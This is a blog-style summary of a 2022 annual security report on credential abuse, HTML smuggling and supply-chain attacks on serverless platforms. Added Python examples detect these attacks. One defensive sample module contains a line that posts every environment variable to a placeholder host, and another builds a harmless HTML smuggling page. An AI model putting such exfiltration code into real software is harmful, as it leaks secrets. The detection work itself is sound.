Expanding Attack Blueprints 2022 Annual Cybersecurity Report
The year 2022 — which was beset with economic turmoil, supply chain problems, and even a war — proved to be an arduous year for organizations not just offline, but online, too. While businesses worked overtime to keep their organizations protected against threats amid challenges and shortages, malicious actors also toiled around the clock to keep their criminal operations running. This is evidenced by the 146.4 billion threats we detected and blocked in 2022, a staggering 55.3% increase from the previous year’s numbers.
This blog entry discusses some of the most critical cybersecurity developments of 2022. The full report, which gives a more detailed view of last year’s threat landscape, is our annual roundup, “Rethinking Tactics: 2022 Annual Security Report.”
Cybercriminals use old and new infiltration strategies
Top three ATT&CK techniques in 2022
Based on our observation of the top MITRE ATT&CK techniques used in last year’s attacks, most malicious actors used similar methods in the initial phases. On closer investigation of the top three ATT&CK techniques for 2022, we observed that cybercriminals gain access via external remote services, then abuse valid accounts and dump credentials to extend that access.
- External Remote Services: Adversaries may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
- Valid Accounts: Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services.
- Credential Dumping: Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
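The three techniques above leave one common trace on the defender's side: a successful remote login with a legitimate account that does not fit that account's normal pattern. The following is an added example (not code from the report or from Trend Micro) that parses constructed sshd authentication lines and flags successful logins preceded by failures from the same source, logins from addresses outside an assumed allow-list, and, optionally, password logins on a host that is expected to use keys. The log lines, host name, users and addresses are made up for the example.

```python
import re
from collections import defaultdict

# Constructed sshd log lines for this example; the host, users and addresses
# are made up and are not from the report.
SAMPLE_AUTH_LOG = """\
Mar  3 02:11:07 bastion sshd[4101]: Failed password for svc-backup from 198.51.100.23 port 50211 ssh2
Mar  3 02:11:09 bastion sshd[4101]: Failed password for svc-backup from 198.51.100.23 port 50211 ssh2
Mar  3 02:11:14 bastion sshd[4103]: Accepted password for svc-backup from 198.51.100.23 port 50214 ssh2
Mar  3 09:02:41 bastion sshd[4388]: Accepted publickey for alice from 10.0.4.17 port 41022 ssh2
Mar  3 09:15:03 bastion sshd[4402]: Accepted password for bob from 10.0.4.18 port 41100 ssh2
"""

# One sshd authentication line: timestamp, host, outcome, auth method, user, source address.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_auth_log(text):
    """Parse sshd authentication lines into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def find_suspicious_logins(events, known_ips, max_failures=2, require_keys=False):
    """Flag successful logins that fit the valid-account-over-remote-service pattern.

    known_ips    - source addresses expected for this host (a static allow-list is an
                   assumption of this example; a real deployment would use a per-user baseline)
    max_failures - failures from the same user/address before a success that we treat
                   as a guessed or replayed credential
    require_keys - if True, any password login is flagged because policy expects keys
    """
    failures = defaultdict(int)
    alerts = []
    for ev in events:
        key = (ev["user"], ev["ip"])
        if ev["result"] == "Failed":
            failures[key] += 1
            continue
        reasons = []
        if ev["ip"] not in known_ips:
            reasons.append("source address not in allow-list")
        if failures[key] >= max_failures:
            reasons.append(f"{failures[key]} failed attempts preceded the success")
        if require_keys and ev["method"] == "password":
            reasons.append("password authentication where keys are required")
        if reasons:
            alerts.append({"ts": ev["ts"], "user": ev["user"], "ip": ev["ip"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    events = parse_auth_log(SAMPLE_AUTH_LOG)
    for alert in find_suspicious_logins(events, known_ips={"10.0.4.17", "10.0.4.18"}):
        print(alert["ts"], alert["user"], alert["ip"], "; ".join(alert["reasons"]))
```

On the sample data only the service account's login is reported: two failures from the same address followed by a success, from an address not on the allow-list. Setting `require_keys=True` additionally surfaces the password login by `bob`, which is the kind of policy check that makes stolen passwords less useful on their own.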
Countering Microsoft’s move with malicious alternatives
Malicious actors have been known to abuse Microsoft Office documents by embedding malicious macros in their attacks. Typically, these malicious payloads are attached to socially engineered emails that attempt to lure victims into inadvertently downloading and executing malware.
In 2022, Microsoft began blocking the execution of macros in Office documents to deter cybercriminals from abusing them as an initial access vector. This move caused a significant decline in the use of Office macros in attacks and prompted cybercriminals to find alternatives, such as HTML smuggling, malvertising, and living-off-the-land tactics.
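With macros blocked, attachment triage has to look for both the old vector and its replacement. The following is an added example (not code from the report) that inspects mail attachments for two things: an OOXML container that still carries a VBA project (a macro-enabled document), and an HTML file that combines the ingredients of HTML smuggling (a base64 decoder, an in-memory Blob and a programmatic download). The sample attachments are constructed in the block; the "smuggled" content is just the string "Hello", and the indicator list and the two-hit threshold are assumptions of this example rather than anything from the report.

```python
import io
import re
import zipfile

# Indicators that an HTML file rebuilds and drops a file on the client
# (the HTML smuggling pattern): a base64 decoder, an in-memory Blob and a
# programmatic download. Each is common in legitimate pages on its own;
# two or more together inside a mail attachment is what earns a closer look.
SMUGGLING_INDICATORS = {
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "blob_construct": re.compile(r"\bnew\s+Blob\s*\(", re.I),
    "forced_download": re.compile(r"\.download\s*=|msSaveOrOpenBlob|createObjectURL", re.I),
}


def has_vba_project(data):
    """True if data is an OOXML (zip) container that carries a VBA project, i.e. macros."""
    if not data.startswith(b"PK"):
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(name.lower().endswith("vbaproject.bin") for name in zf.namelist())
    except zipfile.BadZipFile:
        return False


def html_smuggling_hits(html):
    """Names of the smuggling indicators present in the HTML text."""
    return [name for name, rx in SMUGGLING_INDICATORS.items() if rx.search(html)]


def triage_attachment(filename, data):
    """Return human-readable findings for one attachment (empty list = nothing noted)."""
    findings = []
    if has_vba_project(data):
        findings.append("macro-enabled Office document (vbaProject.bin present)")
    if filename.lower().endswith((".html", ".htm")):
        hits = html_smuggling_hits(data.decode("utf-8", "replace"))
        if len(hits) >= 2:
            findings.append("HTML smuggling indicators: " + ", ".join(hits))
    return findings


def _build_ooxml(with_macro):
    """Construct a minimal zip that mimics an OOXML container (not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\x00")
    return buf.getvalue()


# Constructed samples; the "smuggling" page only decodes the string "Hello".
SAMPLES = {
    "invoice.docm": _build_ooxml(with_macro=True),
    "report.docx": _build_ooxml(with_macro=False),
    "statement.html": (
        '<html><body><script>'
        'var raw = atob("SGVsbG8=");'
        'var blob = new Blob([raw], {type: "application/octet-stream"});'
        'var a = document.createElement("a");'
        'a.href = URL.createObjectURL(blob); a.download = "statement.pdf"; a.click();'
        '</script></body></html>'
    ).encode(),
    "newsletter.html": (
        '<html><body><p>Monthly update</p>'
        '<a href="https://example.test/update.pdf" download>Read the PDF</a></body></html>'
    ).encode(),
}


def triage_all(samples):
    """Run triage over a mapping of filename -> bytes."""
    return {name: triage_attachment(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, findings in triage_all(SAMPLES).items():
        print(name, "->", findings or "clean")
```

The macro check relies on the container rather than the file extension, so a `.docm` renamed to `.docx` is still caught. The HTML check is deliberately a combination of indicators: a plain `download` attribute or a lone `atob` call is ordinary web code, and flagging it alone would drown the mail queue in false positives.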
Malicious actors take aim at the cloud’s weak spots
Supply-chain attack on serverless platforms
As more organizations started shifting to serverless platforms to help them focus on creating better code and not on managing and securing resources, malicious actors were quick to follow suit.
Last year, we investigated the security of serverless platforms, which organizations use to run complex processes and host sensitive data, and identified weak spots that malicious actors can abuse. Malicious actors have started stealing cloud service credentials to read sensitive environment variables and launching supply-chain attacks, such as when a Python library had its code changed to harvest the contents of sensitive variables.
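A tampered dependency of the kind described above usually keeps working as before; what changes is that, on import, it reads the environment and sends it somewhere. The following is an added example (not code from the report) of a static heuristic a defender can run over a dependency's source: it walks the module's AST, records where the environment is read (`os.environ`, `os.getenv`) and where outbound HTTP or socket calls are made, and rates the combination higher when the network call executes at module level, i.e. on import. The three module sources are constructed for the example, the collector hostname is a placeholder, and the list of network prefixes is an assumption rather than a complete one.

```python
import ast

# Dotted names whose use reads the process environment. `from os import environ`
# style imports are not resolved by this example; a real audit would track aliases.
ENV_NAMES = {"os.environ", "os.getenv"}
# Call prefixes that send data off the host (assumed list, not exhaustive).
NETWORK_PREFIXES = ("requests.", "urllib.request.", "http.client.", "httpx.", "socket.")


def dotted_name(node):
    """Turn an Attribute/Name chain such as requests.post into 'requests.post', else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class _Auditor(ast.NodeVisitor):
    """Record where a module reads the environment and where it talks to the network,
    and whether a network call sits at module level (so it runs on import)."""

    def __init__(self):
        self.depth = 0                 # >0 while inside a def
        self.env_reads = set()
        self.network_calls = set()
        self.import_time_network = set()

    def visit_FunctionDef(self, node):
        self.depth += 1
        self.generic_visit(node)
        self.depth -= 1

    visit_AsyncFunctionDef = visit_FunctionDef

    def visit_Attribute(self, node):
        if dotted_name(node) in ENV_NAMES:
            self.env_reads.add(node.lineno)
        self.generic_visit(node)

    def visit_Call(self, node):
        name = dotted_name(node.func)
        if name and name.startswith(NETWORK_PREFIXES):
            self.network_calls.add(node.lineno)
            if self.depth == 0:        # top-level call: executes when the module is imported
                self.import_time_network.add(node.lineno)
        self.generic_visit(node)


def audit_module(source):
    """Static heuristic: environment access plus outbound traffic, worst if it runs on import.
    A 'medium' result is normal for SDKs that read a token and call an API; it is a prompt
    to review the diff, not a verdict."""
    auditor = _Auditor()
    auditor.visit(ast.parse(source))
    env, net, imp = auditor.env_reads, auditor.network_calls, auditor.import_time_network
    if env and imp:
        severity = "high"
    elif env and net:
        severity = "medium"
    elif env or net:
        severity = "low"
    else:
        severity = "none"
    return {
        "env_reads": sorted(env),
        "network_calls": sorted(net),
        "import_time_network": sorted(imp),
        "severity": severity,
    }


# Constructed module sources for the example; the collector hostname is a placeholder.
SAMPLES = {
    "clean": "def add(a, b):\n    return a + b\n",
    "sdk_like": (
        "import os\n"
        "import requests\n"
        "\n"
        "def fetch(url):\n"
        "    token = os.environ['API_TOKEN']\n"
        "    return requests.get(url, headers={'Authorization': token})\n"
    ),
    # Models the tampering the report describes: the library still works, but
    # on import it ships every environment variable to a remote host.
    "tampered": (
        "import os\n"
        "import requests\n"
        "\n"
        "def add(a, b):\n"
        "    return a + b\n"
        "\n"
        "requests.post('https://collector.example.invalid/x', json=dict(os.environ))\n"
    ),
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, audit_module(src))
```

The heuristic is intentionally coarse: a function that is called at module level, or a name bound through `from os import environ`, is not tracked, so it complements rather than replaces pinning dependencies by hash and reviewing diffs between versions. The more durable mitigation for the serverless case is to give functions short-lived, narrowly scoped credentials so that a harvested environment is worth little.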